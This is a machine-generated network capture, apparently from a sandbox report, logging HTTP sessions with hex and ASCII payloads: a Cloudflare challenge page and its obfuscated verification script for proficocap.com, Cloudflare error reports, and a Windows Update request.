                                                                          2024-12-08 19:50:28 UTC1369INData Raw: 79 4b 62 45 52 4f 50 32 41 55 62 5a 44 70 6e 4d 5a 38 66 55 55 56 34 56 6a 4d 33 6a 50 36 71 38 53 2e 4a 64 63 54 6e 65 63 5a 62 4a 37 51 45 4c 5f 49 5f 38 76 43 4d 67 43 58 38 59 31 56 4d 47 54 46 34 57 58 41 71 74 79 39 54 4c 47 2e 55 39 41 4d 4f 30 39 46 57 59 78 70 67 48 78 4a 68 37 5a 79 49 52 4c 51 51 30 61 38 57 57 70 30 52 35 34 4e 6c 62 50 31 74 4d 57 72 62 6e 64 35 48 35 56 5a 47 42 32 69 49 4c 66 71 44 59 45 32 70 66 2e 71 50 52 70 52 76 37 41 4e 42 64 31 31 6b 50 57 73 51 79 69 68 2e 66 41 42 69 71 6a 51 57 66 5a 61 38 33 33 78 74 69 4f 57 37 4b 49 67 50 72 53 58 34 52 49 68 34 4d 46 4e 7a 6a 59 53 5f 35 4a 39 6c 73 61 4a 77 4b 6f 66 61 69 37 42 47 48 43 54 4a 46 4b 48 35 7a 64 48 39 72 71 51 6a 33 46 70 78 51 4a 53 61 67 4f 39 44 71 6c 30 45
                                                                          Data Ascii: yKbEROP2AUbZDpnMZ8fUUV4VjM3jP6q8S.JdcTnecZbJ7QEL_I_8vCMgCX8Y1VMGTF4WXAqty9TLG.U9AMO09FWYxpgHxJh7ZyIRLQQ0a8WWp0R54NlbP1tMWrbnd5H5VZGB2iILfqDYE2pf.qPRpRv7ANBd11kPWsQyih.fABiqjQWfZa833xtiOW7KIgPrSX4RIh4MFNzjYS_5J9lsaJwKofai7BGHCTJFKH5zdH9rqQj3FpxQJSagO9Dql0E
                                                                          2024-12-08 19:50:28 UTC1369INData Raw: 47 53 71 34 68 71 68 4a 6d 7a 45 37 71 35 61 57 52 57 4b 45 59 45 61 69 4d 44 72 67 45 75 67 30 6e 62 49 65 57 53 46 70 4f 79 38 70 51 6f 56 6d 50 54 35 45 6d 70 36 35 61 50 35 6a 68 30 54 67 30 76 51 76 6c 78 64 37 69 58 36 4b 75 51 73 6e 68 31 72 6d 33 34 41 45 58 6a 56 4d 4e 4d 68 53 6c 7a 55 62 4c 6f 70 65 6e 4c 64 4a 42 6f 38 42 39 74 32 35 47 6e 31 6e 32 39 43 4a 61 30 54 44 5f 74 5f 34 44 36 52 4e 61 59 47 6e 62 4c 4c 48 42 44 61 7a 6d 38 43 72 58 30 50 4b 51 36 6d 74 6a 4e 54 79 6f 53 55 4a 37 4b 6a 6b 78 4d 66 76 4c 50 34 37 46 65 38 53 55 4d 6c 73 36 43 64 5f 35 4d 5a 6b 4a 77 6f 68 30 79 36 4f 66 6d 51 65 50 30 49 43 4d 50 5f 44 78 37 73 6e 4a 68 4a 79 38 35 33 77 57 2e 54 6a 35 5f 4d 43 4d 68 36 5a 61 6e 7a 61 59 55 4c 4e 37 49 4c 6e 2e 73 68
                                                                          Data Ascii: GSq4hqhJmzE7q5aWRWKEYEaiMDrgEug0nbIeWSFpOy8pQoVmPT5Emp65aP5jh0Tg0vQvlxd7iX6KuQsnh1rm34AEXjVMNMhSlzUbLopenLdJBo8B9t25Gn1n29CJa0TD_t_4D6RNaYGnbLLHBDazm8CrX0PKQ6mtjNTyoSUJ7KjkxMfvLP47Fe8SUMls6Cd_5MZkJwoh0y6OfmQeP0ICMP_Dx7snJhJy853wW.Tj5_MCMh6ZanzaYULN7ILn.sh
                                                                          2024-12-08 19:50:28 UTC1369INData Raw: 63 59 4d 63 7a 2e 30 57 44 55 76 76 37 6e 48 6a 6f 6e 77 58 49 72 5f 78 70 39 2e 7a 41 2e 79 6c 6c 72 4d 4a 41 47 67 65 72 6c 57 63 6c 57 6a 50 54 77 36 65 71 66 44 7a 44 39 79 4f 77 59 76 5a 2e 5f 33 41 78 69 78 49 41 65 54 65 6b 5a 4d 67 49 6f 68 6e 43 57 5a 39 45 75 36 50 73 51 6d 47 6b 74 36 5a 30 5a 5a 79 4a 4d 78 69 39 42 45 70 75 37 5a 79 74 74 70 44 38 39 6c 33 36 70 76 74 50 46 51 67 6f 7a 45 7a 37 61 6e 4d 4e 66 42 58 4c 38 32 66 67 4a 75 49 33 72 55 4e 6a 4b 56 64 49 54 4e 41 77 55 61 57 49 79 36 39 42 7a 66 74 48 34 55 4a 6a 50 4d 35 47 41 4e 4c 77 45 4d 31 65 4b 37 2e 78 34 69 55 4a 46 64 7a 37 50 45 59 79 64 76 47 4d 6e 73 70 50 75 44 62 38 4f 45 79 72 30 6a 62 65 6c 36 7a 73 37 6f 6d 36 4d 53 35 48 31 5f 4a 62 35 79 6e 30 51 45 50 6e 57 67
                                                                          Data Ascii: cYMcz.0WDUvv7nHjonwXIr_xp9.zA.yllrMJAGgerlWclWjPTw6eqfDzD9yOwYvZ._3AxixIAeTekZMgIohnCWZ9Eu6PsQmGkt6Z0ZZyJMxi9BEpu7ZyttpD89l36pvtPFQgozEz7anMNfBXL82fgJuI3rUNjKVdITNAwUaWIy69BzftH4UJjPM5GANLwEM1eK7.x4iUJFdz7PEYydvGMnspPuDb8OEyr0jbel6zs7om6MS5H1_Jb5yn0QEPnWg
                                                                          2024-12-08 19:50:28 UTC915INData Raw: 46 55 22 7d 3b 76 61 72 20 63 70 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 63 70 6f 2e 73 72 63 20 3d 20 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 67 2f 6f 72 63 68 65 73 74 72 61 74 65 2f 63 68 6c 5f 70 61 67 65 2f 76 31 3f 72 61 79 3d 38 65 65 66 34 38 64 63 32 38 62 30 34 34 30 35 27 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 27 23 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 23 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 77 69 6e 64 6f 77 2e 5f
                                                                          Data Ascii: FU"};var cpo = document.createElement('script');cpo.src = '/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8eef48dc28b04405';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._
                                                                          2024-12-08 19:50:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.44974935.190.80.14431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:28 UTC484OUTPOST /report/v4?s=NtBqaQHfiWWUjgRK%2FdXcPZXeDWXock6mo7Tw%2BIVyfVw2kgvcR5x%2Fwxet3SMCdTYMH51jspIR7N6pOfuOGkUZomiE9avmM15YSSiJ%2F2N1jYPSIX9If38lpWJ%2FHf9Laam1cw%3D%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 385
                                                                          Content-Type: application/reports+json
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:28 UTC385OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 33 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 35 33 2e 31 37 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 66 69 63 6f 63 61 70 2e 63 6f 6d 2f
                                                                          Data Ascii: [{"age":2,"body":{"elapsed_time":3335,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.53.171","status_code":403,"type":"http.error"},"type":"network-error","url":"https://proficocap.com/
                                                                          2024-12-08 19:50:28 UTC168INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          date: Sun, 08 Dec 2024 19:50:28 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.4497454.245.163.56443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1pHf3xNPNeTPsur&MD=9ymk1AwG HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2024-12-08 19:50:29 UTC560INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                          MS-CorrelationId: 7e16023b-6312-4068-8794-dc53cc28561d
                                                                          MS-RequestId: 39190973-3118-47bc-90dd-5bc2939fed32
                                                                          MS-CV: 7o+1kVfkzUapA60Z.0
                                                                          X-Microsoft-SLSClientCache: 2880
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Sun, 08 Dec 2024 19:50:28 GMT
                                                                          Connection: close
                                                                          Content-Length: 24490
                                                                          2024-12-08 19:50:29 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                          2024-12-08 19:50:29 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.449754104.21.53.1714431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:31 UTC982OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8eef48dc28b04405 HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-arch: "x86"
                                                                          sec-ch-ua-full-version: "117.0.5938.132"
                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                          sec-ch-ua-bitness: "64"
                                                                          sec-ch-ua-model: ""
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://proficocap.com/?__cf_chl_rt_tk=alWt9AgDFfYo2aih2ijenQDb0ivCF8gU6Vb8YAtsw9E-1733687428-1.0.1.1-LkP5f.qskE7jddQD4VSpNDRu53KJfHIimFuUUnj55uQ
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:31 UTC878INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:31 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 97343
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YxpAed8%2BPjomAvdIjbvEV%2FbQezQcfCx8RoQs8qBATw7Zu%2BZUce2pXUVEoaiPLYT2s1iuYm%2B5ByRHj%2FwBm1q8sJ3n0hS0Tp%2FD8UD55q%2BHrjzxejC1iFKyEfOmT6tSMk3ouw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef48ef1e628c60-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1842&min_rtt=1835&rtt_var=703&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1582&delivery_rate=1540084&cwnd=54&unsent_bytes=0&cid=78b8839e5718cdbe&ts=509&x=0"
                                                                          2024-12-08 19:50:31 UTC491INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 74 72 75 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 78 45 4a 58 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 7d 2c
                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=true;window._cf_chl_opt.xEJX4={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},
                                                                          2024-12-08 19:50:31 UTC1369INData Raw: 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 62 72 6f 77 73 65 72 5f 6e 6f 74 5f 73 75 70 70 6f 72 74 65 64 5f 61 75 78 22 3a 22 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 25 32 30 6e 65 65 64 73 25 32 30 74 6f 25 32 30 76 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 25 32 30 62 65 66 6f 72 65 25 32 30 70 72 6f 63 65 65 64 69 6e 67 2e
                                                                          Data Ascii: 0your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","browser_not_supported_aux":"%25%7Bplaceholder.com%7D%20needs%20to%20verify%20you%20are%20human%20before%20proceeding.
                                                                          2024-12-08 19:50:31 UTC1369INData Raw: 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 70 61 67 65 5f 74 69 74 6c 65 22 3a 22 4a 75 73 74 25 32 30 61 25 32 30 6d 6f 6d 65 6e 74 2e 2e 2e 22 2c 22 69 6e 74 65 72 73 74 69 74 69 61 6c 5f 68 65 6c 70 65 72 5f 74 69 74 6c 65 22 3a 22 57 68 61 74 25 32 30 69 73 25 32 30 74 68 69 73 25 32 30 50 61 67 65 25 33 46 22 2c 22 69 6e 74 65 72 73 74 69 74 69 61 6c 5f 68 65 6c 70 65 72 5f 65 78 70 6c 61 69 6e 65 72 22 3a 22 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 25 32 30 75 73 65 73 25 32 30 61 25 32 30 73 65 63 75 72 69 74 79 25 32 30 73 65 72 76 69 63 65 25 32 30 74 6f 25 32 30 70 72 6f 74 65 63 74 25 32 30 61 67 61 69 6e 73 74 25 32 30 6d 61 6c 69 63 69 6f 75 73
                                                                          Data Ascii: %3E%20if%20the%20issue%20persists.","page_title":"Just%20a%20moment...","interstitial_helper_title":"What%20is%20this%20Page%3F","interstitial_helper_explainer":"%25%7Bplaceholder.com%7D%20uses%20a%20security%20service%20to%20protect%20against%20malicious
                                                                          2024-12-08 19:50:31 UTC1369INData Raw: 6e 6f 74 25 32 30 63 6f 6d 70 6c 65 74 65 25 32 30 76 65 72 69 66 69 63 61 74 69 6f 6e 22 2c 22 6c 6f 63 61 74 69 6f 6e 5f 6d 69 73 6d 61 74 63 68 5f 77 61 72 6e 69 6e 67 5f 61 75 78 22 3a 22 54 68 65 25 32 30 61 64 64 72 65 73 73 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 72 65 71 75 65 73 74 65 64 25 32 30 77 65 62 73 69 74 65 25 32 30 68 61 73 25 32 30 63 68 61 6e 67 65 64 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 74 25 32 30 61 63 63 65 73 73 69 62 6c 65 2e 25 32 30 54 72 79 25 32 30 61 25 32 30 64 69 66 66 65 72 65 6e 74 25 32 30 6c 69 6e 6b 25 32 30 74 6f 25 32 30 67 65 74 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 64 65 73 69 72 65 64 25 32 30 70 61 67 65 25 32 30 6f 72 25 32 30 74 72 79 25 32 30 67 6f 69 6e 67 25 32 30 74 6f 25 32 30 74 68 65
                                                                          Data Ascii: not%20complete%20verification","location_mismatch_warning_aux":"The%20address%20to%20the%20requested%20website%20has%20changed%20and%20is%20not%20accessible.%20Try%20a%20different%20link%20to%20get%20to%20the%20desired%20page%20or%20try%20going%20to%20the
                                                                          2024-12-08 19:50:31 UTC1369INData Raw: 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 46 2c 65 4d 2c 65 4e 2c 65
                                                                          Data Ascii: eholder.com%7D"},"polyfills":{"turnstile_overrun_description":false,"turnstile_timeout":false,"feedback_report_output_subtitle":false,"turnstile_feedback_description":false,"testing_only_always_pass":false},"rtl":false,"lang":"en-us"};~function(gF,eM,eN,e
                                                                          2024-12-08 19:50:31 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 45 72 4c 4a 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 54 67 51 4a 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 62 50 44 54 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 42 5a 68 6e 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 7a 6d 52 78 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 67 77 6e 45 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 67 46 6c 4a 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e
                                                                          Data Ascii: ction(h,i){return h<i},'ErLJF':function(h,i){return h>i},'TgQJT':function(h,i){return h<i},'bPDTX':function(h,i){return h<i},'BZhnw':function(h,i){return i|h},'zmRxG':function(h,i){return h-i},'gwnEB':function(h,i){return i|h},'gFlJg':function(h,i){return
                                                                          2024-12-08 19:50:31 UTC1369INData Raw: 69 5b 67 4c 28 35 33 34 29 5d 29 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 67 4c 28 31 32 35 35 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 67 4c 28 31 32 36 38 29 5d 5b 67 4c 28 31 30 30 35 29 5d 5b 67 4c 28 34 30 31 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 67 4c 28 31 32 36 38 29 5d 5b 67 4c 28 31 30 30 35 29 5d 5b 67 4c 28 34 30 31 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 20 66 6f 72 28 4d 3d 67 4c 28 37 33 33 29 5b 67 4c 28 31 31 30 30 29 5d 28 27 7c 27 29 2c 4e 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4d 5b 4e 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 64 5b 67 4c 28 37 37 39 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 67 4c 28 39 30 31 29 5d 28 32 2c 46 29
                                                                          Data Ascii: i[gL(534)]);J+=1)if(K=i[gL(1255)](J),Object[gL(1268)][gL(1005)][gL(401)](x,K)||(x[K]=E++,B[K]=!0),L=C+K,Object[gL(1268)][gL(1005)][gL(401)](x,L))C=L;else for(M=gL(733)[gL(1100)]('|'),N=0;!![];){switch(M[N++]){case'0':d[gL(779)](0,D)&&(D=Math[gL(901)](2,F)
                                                                          2024-12-08 19:50:31 UTC1369INData Raw: 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 67 4c 28 33 35 34 29 5d 28 30 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 67 4c 28 31 33 33 37 29 5d 28 48 2c 31 29 7c 4f 26 31 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 67 4c 28 36 39 31 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 64 5b 67 4c 28 36 30 31 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 67 4c 28 39 30 31 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4f 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 67 4c 28 39 37 30 29 5d 28 48 3c 3c 31 2e 38 33 2c 31 2e 34 37 26 4f 29 2c 64 5b 67 4c 28 38 32 37 29 5d 28 49 2c 6a 2d 31 29 3f
                                                                          Data Ascii: H)),H=0):I++,O=0,s++);for(O=C[gL(354)](0),s=0;16>s;H=d[gL(1337)](H,1)|O&1,I==j-1?(I=0,G[gL(691)](o(H)),H=0):I++,O>>=1,s++);}D--,d[gL(601)](0,D)&&(D=Math[gL(901)](2,F),F++),delete B[C]}else for(O=x[C],s=0;s<F;H=d[gL(970)](H<<1.83,1.47&O),d[gL(827)](I,j-1)?
